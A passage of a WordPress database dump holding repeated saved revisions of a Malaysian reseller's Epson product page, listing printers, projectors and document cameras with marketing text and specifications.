stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-25 16:42:59','2019-09-25 08:42:59','',1486,'https://bintara.com.my/blog/2019/09/25/1486-revision-v1/',0,'revision','',0),(3447,1,'2019-09-25 16:44:00','2019-09-25 08:44:00','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><p><strong>Epson WorkForce WF-7711</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /></p><p>Change the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.</p><ul><li>Print speeds up to 18ipm for black and 10ipm for colour</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Duplex printing up to A3 size</li><li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li><li>4.3â€ Colour LCD Touch Panel</li><li>Print, Scan, Copy Fax with ADF</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INK TANK SYSTEM</h3>		\n		<p><strong>Epson EcoTank L3150</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L120 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></p><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson M1100 Printer</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>LASER PRINTER</h3>		\n		<p><strong>Epson AcuLaser C9300N</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></p><p>The Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.</p><ul><li>1200 x 1200 dpi</li><li>Speed: Up to 30ppm</li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li><li>Quality prints with new Epson Technologies</li><li>New print job management features</li></ul>[maxbutton id=\"12\" ]<p>Â <strong>Epson WorkForce AL-M320DNÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /></p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 35ppm</li><li>Auto-Duplex</li><li>Ethernet &amp; Epson iPrint</li><li>2 optional paper cassette tray</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson WorkForce AL-M8100DNÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /></p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 40 ppm</li><li>Epson iPrint</li><li>Ethernet</li><li>4 optional cassette trays</li></ul>[maxbutton id=\"12\" ]		\n			<h3>POS PRINTER</h3>		\n		<p><strong>Epson TM-H6000IVÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T88V-iÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.</p><ul><li>Printing speed of up to 300mm/second</li><li>20 million lines for printer mechanism</li><li>Up to 2 million for auto-cutter</li><li>LAN, Serial, USB 2.0 (Type A) x 4</li><li>Control peripherals easily</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T70IIÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /></p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul>[maxbutton id=\"12\" ]		\n			<h3>PHOTO PRINTER</h3>		\n		<p><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L850 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.</p><ul><li>High-yield ink bottles</li><li>2.7 colour LCD screen</li><li>Direct printing via memory card slot, USB port and PictBridge</li><li>CD/DVD printing</li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L805 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.</p><ul><li>Yield of Up to 1,800 4R photos</li><li>Lowest Printing Costs</li><li>Wi-Fi &amp; Epson iPrint</li><li>CD/DVD Printing Capability</li><li>1 year or 3,000 prints warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-2142W</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p><strong>Epson EB-L500WÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p><strong>Epson EB-1785WÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-25 16:44:00','2019-09-25 08:44:00','',1486,'https://bintara.com.my/blog/2019/09/25/1486-revision-v1/',0,'revision','',0),(3449,1,'2019-09-25 16:47:55','2019-09-25 08:47:55','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" />\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h3>INK TANK SYSTEM</h3>		\n		<p><strong>Epson EcoTank L3150</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson L120 PrinterÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></p><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson M1100 Printer</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>[maxbutton id=\"12\" ]		\n			<h3>LASER PRINTER</h3>		\n		<p><strong>Epson AcuLaser C9300N</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /></p><p>The Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.</p><ul><li>1200 x 1200 dpi</li><li>Speed: Up to 30ppm</li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li><li>Quality prints with new Epson Technologies</li><li>New print job management features</li></ul>[maxbutton id=\"12\" ]<p>Â <strong>Epson WorkForce AL-M320DNÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /></p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 35ppm</li><li>Auto-Duplex</li><li>Ethernet &amp; Epson iPrint</li><li>2 optional paper cassette tray</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson WorkForce AL-M8100DNÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /></p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.</p><ul><li>1200 x 1200 dpi</li><li>Print speed up to 40 ppm</li><li>Epson iPrint</li><li>Ethernet</li><li>4 optional cassette trays</li></ul>[maxbutton id=\"12\" ]		\n			<h3>POS PRINTER</h3>		\n		<p><strong>Epson TM-H6000IVÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T88V-iÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.</p><ul><li>Printing speed of up to 300mm/second</li><li>20 million lines for printer mechanism</li><li>Up to 2 million for auto-cutter</li><li>LAN, Serial, USB 2.0 (Type A) x 4</li><li>Control peripherals easily</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson TM-T70IIÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /></p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul>[maxbutton id=\"12\" ]		\n			<h3>PHOTO PRINTER</h3>		\n		<p><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"550\" height=\"310\" /></p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.</p><ul><li>Yield of up to 1,500 4R photos</li><li>Print speed up to 15ppm</li><li>High-yield ink bottles</li><li>1-year warranty or 9,000 prints</li></ul>[maxbutton id=\"12\" 